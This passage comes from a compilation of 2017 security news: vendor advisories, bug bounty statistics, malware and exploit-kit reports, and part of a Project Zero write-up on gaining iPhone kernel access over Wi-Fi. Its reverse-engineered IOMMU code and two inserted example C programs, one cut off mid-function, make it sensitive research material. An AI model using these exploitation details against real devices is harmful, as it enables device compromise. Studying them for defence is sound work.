“An attacker may exploit these issues by sending a POST request with modified headers towards internal services leading to information disclosure,” VMware said in its advisory.

vCenter Server 5.5 and 6.0 are affected, and patches are included in versions 5.5 U3f and 6.0 U3c.

VMware’s disclosure of the vulnerabilities coincides with the release of vCenter Server 6.0 U3c. The other versions that include patches for these security holes, 5.5 U3f and 6.5 U1, were made available in mid-September and late July, respectively.

Version 6.5 U1 also patched a moderate severity stored cross-site scripting (XSS) vulnerability in the vCenter Server H5 Client. The flaw can be exploited by an authenticated attacker to execute malicious JavaScript code in the targeted user’s context.

vCenter Server versions 5.5, 6.0 and 6.5 are also affected by a bug that allows an attacker with limited user privileges to abuse an API in order to access the guest operating system without authentication. The flaw was disclosed in late July at the Black Hat security conference in Las Vegas, but VMware has only released workarounds for it.

Bug bounty programs and a vulnerability disclosure policy allowed the Pentagon to fix thousands of flaws
13.11.2017 securityaffairs BigBrothers

Bug bounty programs allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.
The ‘Hack the Pentagon’ bug bounty program launched by the Pentagon in 2016, along with the vulnerability disclosure policy announced nearly one year ago, allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.

“Great news for U.S. citizens! Over 3,000 valid security vulnerabilities have been resolved with the U.S. Department of Defense’s “Hack the Pentagon” hacker-powered security program.” reported the platform used by the US Government to manage the initiatives.

“Just over a year ago, following the success of the pilot, we announced the U.S. Department of Defense was expanding its “Hack the Pentagon,” initiatives. To date, HackerOne and DoD have run bug bounty challenges for Hack the Pentagon, Hack the Army and Hack the Air Force.”

The success of the bug bounty programs launched by the US Government has been undeniable.

The hackers have earned over $300,000 in bounties for their contributions. They reported nearly 500 vulnerabilities in nearly 40 DoD components, more than 100 of which have been rated critical or high severity.

Let me also remind you that the DoD vulnerability disclosure program does not offer any monetary rewards, instead it allows hackers to report security holes without the fear of potential legal consequences.

The list of vulnerabilities includes remote code execution, SQL injection, and authentication bypass issues.


The majority of the reports were submitted by US researchers, followed by white hat hackers in India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

Going through the various bug bounty initiatives launched by the US Government, we can see that Hack the Pentagon received 138 valid submissions and paid out roughly $75,000, Hack the Army paid out approximately $100,000 for 118 valid reports, and Hack the Air Force paid out $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs were announced by U.S. authorities.

A China-linked cyber espionage group has been using a new strain of malware dubbed Reaver
13.11.2017 securityaffairs CyberSpy

Experts at Palo Alto Networks have discovered a new malware family named Reaver with ties to hackers who use the SunOrcal malware.
A China-linked cyber espionage group has developed a new strain of malware, dubbed Reaver, that was already observed in highly targeted attacks during 2016.

The malware was analyzed by experts at Palo Alto Networks, who spotted ten different samples belonging to three different versions of the malicious code.


The Chinese cyberspies deliver the malware as Windows Control Panel (CPL) files, a technique that is uncommon in the threat landscape: according to Palo Alto Networks, only 0.006% of the malware it has seen uses this method.

“Unit 42 has discovered a new malware family we’ve named “Reaver” with ties to attackers who use SunOrcal malware. SunOrcal activity has been documented to at least 2013, and based on metadata surrounding some of the C2s, may have been active as early as 2010.” reads the analysis published by Palo Alto Networks.

“The new family appears to have been in the wild since late 2016 and to date we have only identified 10 unique samples, indicating it may be sparingly used. Reaver is also somewhat unique in the fact that its final payload is in the form of a Control panel item, or CPL file. To date, only 0.006% of all malware seen by Palo Alto Networks employs this technique, indicating that it is in fact fairly rare.”

The analysis of the infrastructure used by the threat actor behind the Reaver malware revealed a link to the SunOrcal malware used by China-linked attackers in campaigns that targeted the January 2016 presidential election in Taiwan.

The experts have no information about the intended targets of the Reaver attackers, but previous reports suggest the threat actors primarily target the movements the Chinese government perceives as dangerous, the so-called Five Poisons.

The Five Poisons movements are:

Uyghurs, particularly those supporting East Turkestan independence
Tibetans, particularly those supportive of Tibetan independence
Falun Gong practitioners
Supporters of Taiwan independence
Supporters of Chinese democracy

Starting in late 2016, the attackers used both malware families concurrently, and the same C2 infrastructure was used in the campaigns involving both.

Threat actors behind the SunOrcal malware were known for the use of the Surtr RAT, which has been tied to weaponized document generators named HomeKit and Four Element Sword. The hacker group has been around since at least 2013, but further investigation suggests it may have been active since at least 2010.

The Reaver malware abuses the Windows Control Panel utility, control.exe, to load the final payload. Reaver.v1 has been observed delivering a payload that uses HTTP for network communication, while versions 2 and 3 deliver a payload that uses raw TCP connections instead.

Once Reaver has infected a device, it first gathers information about the compromised system (CPU speed, computer name, username, IP address, memory information and Windows version).

The Reaver malware is also able to perform many other malicious activities, including reading and writing files, altering files and registry keys, terminating processes, and modifying services.

Technical details about the Reaver malware are included in the report published by Palo Alto Networks, it also includes indicators of compromise (IoC) and details on the C&C infrastructure.

Phony WhatsApp used Unicode to slip under Google’s radar
13.11.2017 Malwarebytes Mobil

After a troubling week for Google not so long ago, the company is under the spotlight once more for missing another app that, after further investigations by several members of Reddit, was found laden with adware.

This app, which was called “Update WhatsApp Messenger,” used the logo and developer name of the real WhatsApp app—two elements that a user familiar with the app expects to see. However, the developer name for this bogus app had an extra space at the end, so it looked like this:

WhatsApp, Inc.{space}

To aid users in realizing this deception, Redditor Megared17 posted snapshots of a code section belonging to the real WhatsApp and the fake app to compare the two. We have reproduced the shots below for your convenience.

That bit in the box is the percent coding equivalent of a blank space, which translates to U+00A0, the Unicode value of a no-break space. Although this is something our normal eyes may have a difficult time spotting, many decried that Google’s scanner should have quickly picked this up.
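The comparison the Reddit screenshots invite can be automated. The following is an added example, not Malwarebytes' or the Reddit posters' code: it decodes a percent-encoded developer name as it appears in a listing, rejects any code point that renders as blank or invisible (U+00A0 among them) before it ever reaches a string comparison, and only then compares the result byte-for-byte with the expected name. The expected name, the sample strings and the list of invisible code points are the example's own constructions, not data from the article.

```c
/* Added example (not Malwarebytes' or the Reddit posters' code): flag a
 * developer name that looks right but hides non-ASCII or invisible
 * whitespace, such as the trailing U+00A0 (percent-encoded %C2%A0) carried
 * by the fake "WhatsApp, Inc." listing. Samples below are constructed. */
#include <ctype.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { NAME_OK = 0, NAME_MALFORMED = 1, NAME_INVISIBLE_CHAR = 2, NAME_MISMATCH = 3 };

/* Decode %XX escapes into raw bytes. Returns the byte length, or -1 on a
 * truncated escape, an encoded NUL, or an output buffer overflow. */
static int percent_decode(const char *in, unsigned char *out, size_t outsz)
{
    size_t n = 0;
    for (; *in; in++) {
        unsigned char v = (unsigned char)*in;
        if (v == '%') {
            if (!isxdigit((unsigned char)in[1]) || !isxdigit((unsigned char)in[2]))
                return -1;
            char hex[3] = { in[1], in[2], '\0' };
            v = (unsigned char)strtol(hex, NULL, 16);
            in += 2;
        }
        if (v == 0 || n + 1 >= outsz) return -1;
        out[n++] = v;
    }
    out[n] = '\0';
    return (int)n;
}

/* Decode one UTF-8 sequence; returns bytes consumed (1..4) or 0 if malformed
 * or truncated. Sufficient for this check; overlong forms are not rejected. */
static int utf8_next(const unsigned char *s, size_t len, uint32_t *cp)
{
    if (len == 0) return 0;
    unsigned char b = s[0];
    int n;
    uint32_t c;
    if (b < 0x80) { *cp = b; return 1; }
    if ((b & 0xE0) == 0xC0)      { n = 2; c = b & 0x1F; }
    else if ((b & 0xF0) == 0xE0) { n = 3; c = b & 0x0F; }
    else if ((b & 0xF8) == 0xF0) { n = 4; c = b & 0x07; }
    else return 0;
    if (len < (size_t)n) return 0;
    for (int i = 1; i < n; i++) {
        if ((s[i] & 0xC0) != 0x80) return 0;
        c = (c << 6) | (s[i] & 0x3F);
    }
    *cp = c;
    return n;
}

/* Code points that render blank or not at all: NBSP, soft hyphen, the U+2000
 * spaces and zero-width characters, line/paragraph separators, ideographic
 * space, word joiner, BOM. The list is the example's own, not the article's. */
static int is_invisible(uint32_t cp)
{
    return cp == 0x00A0 || cp == 0x00AD || cp == 0x1680 ||
           (cp >= 0x2000 && cp <= 0x200F) || cp == 0x2028 || cp == 0x2029 ||
           cp == 0x202F || cp == 0x205F || cp == 0x2060 || cp == 0x3000 ||
           cp == 0xFEFF;
}

/* Compare a percent-encoded developer name with the expected ASCII name.
 * Reports the first invisible code point through *bad_cp (may be NULL);
 * any other difference, including a plain trailing space, is a mismatch. */
int check_developer_name(const char *encoded, const char *expected, uint32_t *bad_cp)
{
    unsigned char buf[256];
    int len = percent_decode(encoded, buf, sizeof buf);
    if (len < 0) return NAME_MALFORMED;
    for (size_t i = 0; i < (size_t)len; ) {
        uint32_t cp;
        int n = utf8_next(buf + i, (size_t)len - i, &cp);
        if (n == 0) return NAME_MALFORMED;
        if (is_invisible(cp)) {
            if (bad_cp) *bad_cp = cp;
            return NAME_INVISIBLE_CHAR;
        }
        i += (size_t)n;
    }
    return strcmp((const char *)buf, expected) == 0 ? NAME_OK : NAME_MISMATCH;
}

int main(void)
{
    /* Constructed samples: the genuine name and the spoofed one from the story */
    const char *samples[] = { "WhatsApp,%20Inc.", "WhatsApp,%20Inc.%C2%A0" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        uint32_t cp = 0;
        int r = check_developer_name(samples[i], "WhatsApp, Inc.", &cp);
        printf("%-24s -> %s", samples[i],
               r == NAME_OK ? "ok" : r == NAME_INVISIBLE_CHAR ? "invisible char" :
               r == NAME_MISMATCH ? "mismatch" : "malformed");
        if (r == NAME_INVISIBLE_CHAR) printf(" U+%04X", (unsigned)cp);
        putchar('\n');
    }
    return 0;
}
```

The ordering matters: a naive `strcmp` against the expected name would also catch the spoof, but it reports only "mismatch"; decoding to code points first lets the check say which character was hidden, and it also refuses malformed escapes and truncated UTF-8 rather than comparing garbage.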

Read: Out of character: Homograph attacks explained

Redditor Dextersgenius pointed out that, once downloaded and installed, “Update WhatsApp Messenger” hid from users by “not having a title and having a blank icon,” which he supplemented with screenshots that we have also reproduced below.

In their testing, Dextersgenius also pointed to a piece of code indicating that the bogus app accesses a hardcoded bit.ly shortened URL that presumably downloads an update APK named whatsapp.apk. Upon closer inspection, however, the bit.ly URL led to another shortened URL—this time Google’s URL shortener, goo.gl—that then led to a Google search result for a WhatsApp Messenger APK file.

Essentially, users are told to “Look for the APK file from these search results. It’s got to be in one of them!” No updates are sent to the phones at all, so they’re just left with a PUP app.

“Users need to be more vigilant,” advised Armando Orozco, Lead for the Mobile Protection Team at Malwarebytes. “If they want to update WhatsApp, they need to use the update mechanism in the Play Store app, not a secondary app.”

Apart from reading app reviews for any reports of questionable behavior, it also pays for users to check the link to the developer of the app, which might have helped catch “Update WhatsApp Messenger” and possibly lessen the number of affected devices.

Disdain exploit kit and a side of social engineering deliver Neutrino Bot
13.11.2017 Malwarebytes
Today we picked up new activity from an exploit kit that was first discovered back in August of this year. The Disdain exploit kit, simply identified by a string of the same name found in its source code, is being distributed again after a short interruption via malvertising chains.

Disdain EK relies on older vulnerabilities that have long been patched and some that do not appear to be working properly. From a traffic to infection point of view, this means that the conversion rates are going to be lower than, say, RIG EK, the other most common exploit kit at the moment.

This may explain why we are seeing Disdain being used as a drive-by download alongside a social engineering attack to increase the likelihood of infections. Case in point, the following site was compromised to serve Disdain EK while also distributing a fake Flash Player update:

What’s interesting is that both payloads (Disdain’s malware drop and the so-called Flash update) are actually the same malicious binary, just delivered by different methods. The former is loaded via an iframe injected into the page which triggers the exploit kit and delivers the payload automatically, while the latter is a regular download that requires user interaction to download and run it.

Disdain’s landing page exploits older Internet Explorer vulnerabilities and attempts to load Flash exploits as well, although in our tests these did not work.

That payload is Neutrino Bot, which we have documented on this blog before when it was served in malicious spam campaigns as well as via the now defunct Neutrino exploit kit. Neutrino Bot, AKA Kasidet, is a multi-purpose piece of malware known for its information-stealing abilities.

In the past few weeks, there have been a few developments in the exploit kit scene beyond the long running RIG exploit kit, where threat actors are attempting new tricks both from an evasion and distribution point of view. Despite this, there remains a lack of innovation in what really matters at the end of the day: the exploits being used to deliver drive-by infections.

While some groups have switched to pure social engineering-based attacks, others are attempting either or both methods at once. In the current threat landscape, the campaigns that have the most success are those that can draw a lot of traffic and use clever techniques to fool users.

Systems that have been patched regularly would not be affected by this exploit kit, but at the same time users should beware of non-legitimate software updates. Many of the so-called “Flash Player” or “Video Player” updates typically push adware and, as we saw recently with the BadRabbit outbreak, even ransomware.

Malwarebytes users are protected from the Disdain exploit kit and Neutrino Bot malware.

Over The Air - Vol. 2, Pt. 3: Exploiting The Wi-Fi Stack on Apple Devices
13.11.2017 Google Project Zero  Apple

In this blog post we’ll complete our goal of achieving remote kernel code execution on the iPhone 7, by means of Wi-Fi communication alone.

After developing a Wi-Fi firmware exploit in the previous blog post, we are left with the task of using our newly acquired access to gain control over the XNU kernel. To this end, we’ll begin by investigating the isolation mechanisms present on the iPhone. Next, we’ll explore the ways in which the host interacts with the Wi-Fi chip, identify several attack surfaces, and assess their corresponding security properties. Finally, we’ll discover multiple vulnerabilities and proceed to develop a fully-functional reliable exploit for one of them, allowing us to gain control over the host’s kernel.

All the vulnerabilities presented in this blog post (#1, #2, #3, #4, #5, #6, #7) were reported to Apple and subsequently fixed in iOS 11. For an analysis of other affected devices in the Apple ecosystem, see the corresponding security bulletins.
Hardware Isolation

Broadcom’s Wi-Fi chips are present in a wide range of platforms, including mobile phones, IoT devices and Wi-Fi routers. To accommodate this variance, each chip must be sufficiently configurable, supporting several different interfaces for vendors wishing to integrate the chip into their platform. Indeed, Cypress’s data sheets include a wide range of supported interfaces, including PCIe, SDIO and USB.

While choosing the interface with which to integrate the chip may seem inconsequential, it could have far ranging security implications. Each interface comes with different security guarantees, affecting the degree to which the peripheral may be “isolated” from the host. As we’ve already demonstrated how the Wi-Fi chip’s security can be subverted by remote attackers, it’s clear that providing isolation is crucial in sufficiently safeguarding the host.

From a security perspective, both SDIO and USB (up to 3.1) inherently offer some degree of isolation. SDIO solely enables the serial transfer of information between the host and the target device. Similarly, USB allows the transfer of “packets” between peripherals and the host. Broadly speaking, both interfaces can be thought of as facilitating an explicit communication channel between the host and the peripheral. All the data transported through these interfaces must be explicitly handled by either peer, by inspecting incoming requests and responding accordingly.

PCIe operates using a different paradigm. Instead of communicating with the host using a communication protocol, PCIe allows peripherals to gain Direct Memory Access (DMA) to the host’s memory. Using DMA, peripherals may autonomously prepare data structures within the host’s memory, only signalling the host (via a Message Signalled Interrupt) once there’s processing to be done. Operating in this manner allows the host to conserve computing resources, as opposed to protocols that require processing to transfer data between endpoints or to handle each individual request.

Efficient as this approach may be, it also raises some challenges with regards to isolation. First and foremost, how can we be guaranteed that malicious peripherals won’t abuse this access in order to attack the host? After all, in the presence of full control over the host’s memory, subverting any program running on the host is trivial (for example, peripherals may freely modify a program’s stack, alter function pointers, overwrite code -- all unbeknownst to the host itself).

Luckily, this issue has not gone unaddressed. Sufficient isolation for DMA-capable components can be achieved by partitioning the visible memory space available to the peripheral using a dedicated hardware component - an I/O Memory Management Unit (IOMMU).

IOMMUs facilitate a memory translation service for peripherals, converting their addressable memory ranges (referred to as “IO-Space”) into ranges within the host’s Physical Address Space (PAS). Configuring the IOMMU’s translation tables allows the host to selectively control which portions of its memory are exposed to each peripheral, while safeguarding other ranges against potentially malicious access. Consequently, the bulk of the responsibility for providing sufficient isolation lies with the host.

Returning to the issue at hand, as we are focusing on the Wi-Fi stack present within Apple’s ecosystem, an immediate question springs to mind -- which interfaces does Apple leverage to connect the Wi-Fi chip to the host? Inspecting the Wi-Fi firmware images present in several generations of Apple devices reveals that since the iPhone 6 (included), Apple has opted for PCIe to connect the Wi-Fi chip to the host. Older models, such as the iPhone 5c and 5s, relied on a USB interface instead.

Due to the risks highlighted above, it is crucial that recent iPhones utilise an IOMMU to isolate themselves from potentially malicious PCIe-connected Wi-Fi chips. Indeed, during our previous research into the isolation mechanisms on Android devices, we discovered that no isolation was enforced in two of the most prominent SoCs; Qualcomm’s Snapdragon 810 and Samsung’s Exynos 8890, thereby allowing the Wi-Fi chip to freely access the host’s memory (leading to complete compromise of the device).
Inspecting the DMA Engine

To gain some visibility into the isolation capabilities present on the iPhone 7, we’ll begin by exploring the Wi-Fi firmware itself. If a form of isolation is present, the memory ranges used by the Wi-Fi SoC to perform DMA operations and those utilised by the host would be disparate. Conversely, if we happen to find the same ranges of physical addresses, that would hint that no isolation is taking place.

Luckily, much of the complexity involved in reverse-engineering the firmware’s DMA functionality can be forgone, as Broadcom’s SoftMAC drivers (brcm80211) contain the majority of the code used to interface with the SoC’s DMA engine.

Each DMA engine facilitates transfers in a single direction between two endpoints; one representing the Wi-Fi firmware, and another denoting either an internal core within the Wi-Fi SoC (such as when interacting with the RX or TX FIFOs) or the host itself. As we are interested in inspecting the memory ranges used for transfers originating in the Wi-Fi chip and terminating at the host, we must locate the DMA engine responsible for “dongle-to-host” memory transfers.

As it happens, this task is rather straightforward. Each “dma_info” structure in the firmware (representing a DMA engine) is prefixed by a pointer to a block of DMA-related function pointers stored in the firmware’s RAM. Since the block is placed at a fixed address, we can locate all instances of the structure by searching for the pointer within the firmware’s RAM. For each instance we come across, inspecting the “name” field encoded in the structure should allow us to deduce the identity of the DMA engine in question.

Combining these two tidbits, we can quickly locate each DMA engine in the firmware’s RAM:

The first few instances clearly relate to internal DMA engines. The last instance, labeled “H2D”, indicates “host-to-dongle” memory transfers. Therefore, by elimination, the single entry left must correspond to transfers from the dongle to the host (sneakily left unnamed!).

Having located the engine, all that remains is to dump the RX descriptor ring and extract the addresses to which DMA transfers are performed. Unfortunately, descriptors are rapidly consumed after being inserted into the corresponding rings, replacing their contents with generic placeholder values. Therefore, observing the value of a non-consumed descriptor from a single memory snapshot is tricky. Instead, to extract “fresh” descriptors, we’ll insert a hook on the DMA transfer function, allowing us to dump descriptor addresses before they are inserted into the corresponding rings.

After inserting the hook, we are presented with the following output:

All of the descriptor addresses appear to be 32-bits wide...

How do the above addresses relate to our knowledge of the physical address space on the iPhone 7? The DRAM’s base address in the host’s physical address space is denoted by the “gPhysBase” variable (stored in the kernel’s BSS). Reading this value from our research platform will allow us to determine whether the DMA descriptor addresses correspond to host-side physical ranges:

Ah-ha! The iPhone 7’s DRAM is based at 0x800000000 -- an address beyond a 32-bit range.

Therefore, some form of conversion is taking place between the ranges visible to the Wi-Fi chip (IO-Space) and those corresponding to the host’s physical address space. To locate the root cause of this conversion, let’s shift our attention back towards the host.

The host and the Wi-Fi chip communicate with one another using a protocol designed by Broadcom, dubbed “MSGBUF”. Using the protocol, both endpoints are able to transmit and receive control messages, as well as traffic, through a set of “message rings”. Each ring is stored within the host’s memory, but is also made accessible to the firmware through DMA.

Since the rings must be accessible through DMA to the Wi-Fi chip, locating the code responsible for their initialisation might shed some light on the process through which their physical addresses are converted to the DMA-accessible addresses we encountered in the firmware’s DMA descriptors.

Reverse-engineering AppleBCMWLANBusInterfacePCIe, we quickly arrive at the function responsible for initialising the IPC structures utilised by the Wi-Fi chip and the host, including the aforementioned rings:

void* init_ring(void* this, uint64_t alignment, IOMapper* mapper, ...) {
    ...
    IOOptionBits options = kIOMemoryTypeVirtual | kIODirectionOutIn;
    IOBufferMemoryDescriptor* desc =
        IOBufferMemoryDescriptor::inTaskWithOptions(kernel_task,
                                                    options,
                                                    capacity,
                                                    alignment);
    ...
    IODMACommand* cmd = IODMACommand::withSpecification(
                            IODMACommand::OutputLittle64, //outSegFunc
                            0,                            //numAddressBits
                            0,                            //maxSegmentSize
                            0,                            //mappingOptions
                            0,                            //maxTransferSize
                            1,                            //alignment
                            mapper,                       //mapper
                            0);                           //refCon
    ...
    cmd->setMemoryDescriptor(desc, true);
    ...
}
function 0xFFFFFFF006D1C074

As we can see above, the function utilises I/O Kit APIs to manage and map DMA-capable descriptors.

Upon closer inspection, we can see that IODMACommand defers the actual mapping operations to the provided IOMapper instance (“mapper” in the snippet above). However, as luck would have it, the same “mapper” object is stored within the “PCIe object” we identified in the first part of our research. Therefore, we can proceed to extract the IOMapper instance and begin tracing through its associated code paths.

While the source code for IOMapper is available in the open-sourced portions of XNU, it does not perform any actual mapping operations, but rather delegates them to the “System Mapper” - a globally registered IOMapper instance. Since no concrete subclasses of IOMapper are present in the open-sourced portions of XNU, we can assume that a specialised subclass, performing the actual mapping implementation, exists in one of the proprietary KEXTs.

Indeed, following the extracted IOMapper’s virtual table, we arrive at the IODARTMapper class, under com.apple.driver.IODARTFamily -- it seems a specialised IOMapper is used after all!

Before we continue down the rabbit hole, let’s take a step back and assess the situation. According to Apple’s documentation, DART stands for “Device Address Resolution Table” -- a hardware component integrated into the memory controller, whose purpose it is to provide a separate address space mapping for 32-bit PCI peripherals. DART allows the system to map physical addresses beyond the 32-bit range to peripherals, and to provide fine-grained control over the memory ranges exposed to each device. In short, this is none other than a proprietary IOMMU designed by Apple!

Digging deeper into IODARTMapper, we find iovmInsert; the entry point for inserting new IO-Space translations through a mapper. Passing through several more layers of indirection, we finally arrive at an instance of AppleS5L8960XDART.

The latter object originates in a different driver; com.apple.driver.AppleS5L8960XDART. It appears we’re getting closer to the bare-metal DART implementation for the SoC! Oddly, the driver references “S5L8960X”; the product code for the Apple A7 SoC (used in older iPhones, such as the 5s). Perhaps this artefact suggests that the same DART implementation has been used in prior SoC revisions.

Taking a closer look at AppleS5L8960XDART, we quickly come across a function of particular interest. This function performs many bit shifts and masks, much like we’d expect from translation-table management code. After spending some time familiarising ourselves with the code, we come to the realisation that the function is responsible for populating DART’s translation tables! Here is a high-level representation of the relevant code:

void* create_descriptors(void* this, uint64_t table_index,
                         uint32_t start_pfn, uint32_t map_size, ...) {
    ... //Validate input arguments, acquire mutex
    void** dart_table = ((void***)(this + 312))[table_index];
    uint32_t end_pfn = start_pfn + map_size;

    //Populating each L0 descriptor in the range
    uint32_t l0_start_idx = (start_pfn >> 18) & 0x3;
    uint32_t l0_end_idx = (end_pfn >> 18) & 0x3;
    for (uint32_t l0_idx = l0_start_idx; l0_idx <= l0_end_idx; l0_idx++) {

        //Creating the L1 table if it doesn’t already exist
        struct l1_table_t* l1_table = (struct l1_table_t*)(dart_table[l0_idx]);
        if (!l1_table) {
            l1_table = allocate_l1_table(this);
            dart_table[l0_idx] = l1_table;
            uint64_t table_phys = l1_table->desc->getPhysicalSegment(...);
            uint64_t l0_desc = ((table_phys >> 12) & 0xFFFFFF) | 0x80000000;
            OSSynchronizeIO();
            set_l0_desc(this, table_index, l0_idx, l0_desc);
        }

        //Calculating the range of L1 descriptors to populate
        uint32_t l1_start_idx = (l0_idx == l0_start_idx) ?
                                    (start_pfn >> 9) & 0x1FF : 0;
        uint32_t l1_end_idx = (l0_idx == l0_end_idx) ?
                                    (end_pfn >> 9) & 0x1FF : 511;

        //Populating each L1 descriptor in the range
        for (uint32_t l1_idx = l1_start_idx; l1_idx <= l1_end_idx; l1_idx++) {

            //Creating the L2 table if it doesn’t already exist
            struct l2_table_t* l2_table;
            l2_table = (struct l2_table_t*)l1_table->l2_tables[l1_idx];
            if (!l2_table) {
                l2_table = allocate_l1_desc(this);
                l1_table->l2_tables[l1_idx] = l2_table;
                uint64_t table_phys = l2_table->desc->getPhysicalSegment(...);
                l1_table->descriptors[l1_idx] = (table_phys & 0xFFFFFF000) | 3;
                OSSynchronizeIO();
                ...
            }
        }
    }
    ... //Release mutex
}

struct l1_table_t {
    IOBufferMemoryDescriptor* desc;     //Descriptor holding L1 table
    uint64_t* descriptors;              //Kernel VA ptr to L1 descs
    struct l2_table_t* l2_tables[512];  //L2 descriptors within this table
};

struct l2_table_t {
    IOBufferMemoryDescriptor* desc;     //Descriptor holding L2 table
    uint64_t* descriptors;              //Kernel VA ptr to L2 descs
    uint64_t unknown;
};
function 0xFFFFFFF0065978F0

Alright! Let’s take a moment to unpack the above function.

For starters, it appears that DART utilises a 3-level translation regime. The first level is capable of holding up to four descriptors, while each subsequent level holds 512 descriptors. Since DART uses a 4KB translation granule, we can deduce that each L2 table maps 0x200000 bytes (512 x 4KB) into IO-Space, while each L1 table maps up to 0x40000000 bytes (512 L2 tables).

In addition to the 3-level regime specified above, DART holds four “base descriptors”. Unlike regular descriptors, these are not indexed by bits in the IO-Space address, but are instead referenced explicitly using a parameter provided by the caller.

Drawing on our knowledge of PCIe, we can speculate on the nature of these “base descriptors”. Perhaps each DART can facilitate mappings for several different PCI peripherals on the same bus, where each “base descriptor” corresponds to one such device (based on the “Requester-ID” encoded in the incoming TLP)? Whether or not this is the case, dumping the “base descriptors” in the DART instance corresponding to the Wi-Fi chip reveals that only the first descriptor is populated in our case.

In order to access the DART mappings, two distinct sets of data structures are utilised in tandem; a set of “convenience” structures which map the translation hierarchy into high-level objects within the kernel’s virtual address space, and another set holding the descriptors themselves, which are linked together based on physical addresses. The former set is used by the kernel to conveniently locate and modify DART’s mappings, while the latter is used by DART’s hardware to perform the actual IO-Space translations.

Looking more closely at the descriptors, it appears that the translation format utilised by DART is proprietary, and does not match the formats present in the ARM VMSA (including those utilised by SMMUs). Nonetheless, we can deduce the descriptors’ composition by inspecting the code above, which constructs and populates descriptors across the translation hierarchy.

L0 descriptors encode the physical frame number (using a 4KB translation granule) corresponding to the next level table in the lower bits, and set the 31st bit to indicate a valid entry. L1 and L2 descriptors, on the other hand, use the bottom two bits to indicate validity (setting both bits denotes a valid entry, other combinations result in translation faults), while the top bits store the physical address of either the next translation table or of the 4KB region mapped into IO-Space.

Lastly, we must deduce IO-Space’s base address to complete our analysis of DART’s translation format. Drawing on our previous encounter with IO-Space addresses stored in the DMA descriptors within the Wi-Fi firmware, all the addresses appeared to be based at address 0x80000000. As such, it seems like a fair assumption that IO-Space mappings for the Wi-Fi chip begin at the aforementioned address.

Combining all of the information above, let’s build a module in our research platform to interact with the DART instance. The module will analyse DART’s translation tables, following the hierarchy described above. By analysing the translation tables, we can subsequently hold a mapping between IO-Space addresses and their corresponding physical ranges within the host’s PAS. Furthermore, we can invert the tables in order to produce a PAS to IO-Space mapping. Using these two mappings we can subsequently convert IO-Space addresses to physical addresses, and vice versa.

Finally, in addition to inspecting IO-Space, our DART module also allows us to manipulate IO-Space, by introducing new mappings into IO-Space containing whichever physical address we desire.
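To make the deduced translation format concrete, here is a software model of DART’s 3-level hierarchy, written as an added example for this page (it is not Apple’s code, nor the research platform module described above). It reuses the descriptor encodings visible in create_descriptors, takes the 0x80000000 IO-Space base as the assumption the text makes, and backs its translation tables with a constructed toy physical address space (SIM_PAS_BASE, a made-up address) so that it runs offline. It provides the forward walk (IO-Space to PAS), on-demand table creation, and the inverted PAS-to-IO-Space lookup the module above is said to offer.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Software model of the 3-level DART translation scheme described above.
 * Descriptor encodings copy create_descriptors(); the IO-Space base is the
 * 0x80000000 assumption made in the text; the physical address space is a
 * constructed toy that only backs the translation tables themselves. */
#define DART_IOVA_BASE 0x80000000ULL
#define PAGE_SIZE      4096ULL
#define L0_ENTRIES     4
#define L1_ENTRIES     512
#define L2_ENTRIES     512
#define SIM_PAS_BASE   0x800000000ULL   /* made-up PA of toy page 0 */
#define SIM_PAGES      8
static uint64_t sim_pas[SIM_PAGES][PAGE_SIZE / sizeof(uint64_t)];
static unsigned sim_next_page;

static uint64_t *table_at(uint64_t pa)   /* toy PA -> kernel VA; NULL if not a toy page */
{
    if (pa < SIM_PAS_BASE || pa >= SIM_PAS_BASE + SIM_PAGES * PAGE_SIZE) return NULL;
    return sim_pas[(pa - SIM_PAS_BASE) / PAGE_SIZE];
}
static uint64_t alloc_table(void)        /* zeroed 4KB table page, 0 when exhausted */
{
    if (sim_next_page >= SIM_PAGES) return 0;
    uint64_t pa = SIM_PAS_BASE + sim_next_page++ * PAGE_SIZE;
    memset(table_at(pa), 0, PAGE_SIZE);
    return pa;
}

/* L0 (held in DART registers): PFN of the L1 table in bits 0-23, bit 31 = valid.
 * L1/L2 (in memory): target address bits 12-35, bits 0-1 both set = valid. */
static uint64_t l0_encode(uint64_t pa) { return ((pa >> 12) & 0xFFFFFF) | 0x80000000ULL; }
static int      l0_valid(uint64_t d)   { return (d & 0x80000000ULL) != 0; }
static uint64_t l0_target(uint64_t d)  { return (d & 0xFFFFFF) << 12; }
static uint64_t lx_encode(uint64_t pa) { return (pa & 0xFFFFFF000ULL) | 3; }
static int      lx_valid(uint64_t d)   { return (d & 3) == 3; }
static uint64_t lx_target(uint64_t d)  { return d & 0xFFFFFF000ULL; }

struct dart_sim { uint64_t l0[L0_ENTRIES]; };

static int split_iova(uint64_t iova, unsigned *a, unsigned *b, unsigned *c)
{
    if (iova < DART_IOVA_BASE) return -1;
    uint64_t pfn = (iova - DART_IOVA_BASE) / PAGE_SIZE;
    if (pfn >> 20) return -1;            /* 2 + 9 + 9 index bits: 4GB of IO-Space */
    *a = (pfn >> 18) & 0x3; *b = (pfn >> 9) & 0x1FF; *c = pfn & 0x1FF;
    return 0;
}

/* IO-Space -> PAS, walking the hierarchy as the hardware would. -1 = translation fault. */
int dart_translate(const struct dart_sim *d, uint64_t iova, uint64_t *pa)
{
    unsigned a, b, c;
    if (split_iova(iova, &a, &b, &c) != 0 || !l0_valid(d->l0[a])) return -1;
    uint64_t *l1t = table_at(l0_target(d->l0[a]));
    if (!l1t || !lx_valid(l1t[b])) return -1;
    uint64_t *l2t = table_at(lx_target(l1t[b]));
    if (!l2t || !lx_valid(l2t[c])) return -1;
    *pa = lx_target(l2t[c]) | (iova & (PAGE_SIZE - 1));
    return 0;
}

/* Map one 4KB page, creating L1/L2 tables on demand as create_descriptors() does. */
int dart_map(struct dart_sim *d, uint64_t iova, uint64_t pa)
{
    unsigned a, b, c;
    if (split_iova(iova, &a, &b, &c) != 0) return -1;
    if (!l0_valid(d->l0[a])) { uint64_t t = alloc_table(); if (!t) return -1; d->l0[a] = l0_encode(t); }
    uint64_t *l1t = table_at(l0_target(d->l0[a]));
    if (!l1t) return -1;
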